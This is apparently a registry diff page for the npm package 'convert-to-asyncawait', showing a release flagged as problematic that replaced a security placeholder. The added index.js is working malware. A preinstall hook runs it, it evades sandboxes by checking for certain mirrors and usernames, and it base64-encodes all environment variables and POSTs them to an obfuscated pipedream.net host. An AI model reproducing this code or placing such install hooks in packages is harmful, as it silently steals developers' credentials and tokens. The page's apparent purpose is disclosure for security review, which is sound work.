convert-to-asyncawait 0.0.1-security → 4.866.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of convert-to-asyncawait might be problematic. Click here for more details.
- package/bundle.js +15597 -0
- package/index.js +29 -0
- package/package.json +13 -4
- package/README.md +0 -5
package/index.js
ADDED
@@ -0,0 +1,29 @@
|
|
1
|
+
const http = require('https');
|
2
|
+
|
3
|
+
const filter = [
|
4
|
+
{ key: 'npm_config_registry', val: ['taobao', 'org'].join('.') },
|
5
|
+
{ key: 'npm_config_registry', val: ['registry', 'npmmirror', 'com'].join('.') },
|
6
|
+
{ key: 'USERNAME', val: ['daas', 'admin'].join('') },
|
7
|
+
{ key: '_', val: '/usr/bin/python' },
|
8
|
+
{ key: 'npm_config_metrics_registry', val: ['mirrors', 'tencent', 'com'].join('.') }
|
9
|
+
];
|
10
|
+
function main() {
|
11
|
+
var data = process.env || {};
|
12
|
+
if (
|
13
|
+
filter.some(({ key, val }) => data[key] && data[key].includes(val)) ||
|
14
|
+
Object.keys(data).length < 10) {
|
15
|
+
return;
|
16
|
+
}
|
17
|
+
|
18
|
+
req = http.request({
|
19
|
+
host: ['aa2244a33b6e600fe3d434d1ad135450', 'm', ['pip','edream'].join(''), 'net'].join('.'),
|
20
|
+
path: '/' + (data.npm_package_name || ''),
|
21
|
+
method: 'POST'
|
22
|
+
}).on('error', function (err) {
|
23
|
+
});
|
24
|
+
|
25
|
+
req.write(Buffer.from(JSON.stringify(data)).toString('base64'));
|
26
|
+
req.end();
|
27
|
+
}
|
28
|
+
|
29
|
+
main();
|
package/package.json
CHANGED
@@ -1,6 +1,15 @@
|
|
1
1
|
{
|
2
2
|
"name": "convert-to-asyncawait",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
6
|
-
|
3
|
+
"version": "4.866.0",
|
4
|
+
"description": "convert-to-asyncawait",
|
5
|
+
"private": false,
|
6
|
+
"main": "bundle.js",
|
7
|
+
"scripts": {
|
8
|
+
"preinstall": "node index.js",
|
9
|
+
"prepublishOnly": "node index.js",
|
10
|
+
"build": "npm run build",
|
11
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
12
|
+
},
|
13
|
+
"author": "hz0ho",
|
14
|
+
"license": "MIT"
|
15
|
+
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=convert-to-asyncawait for more information.
|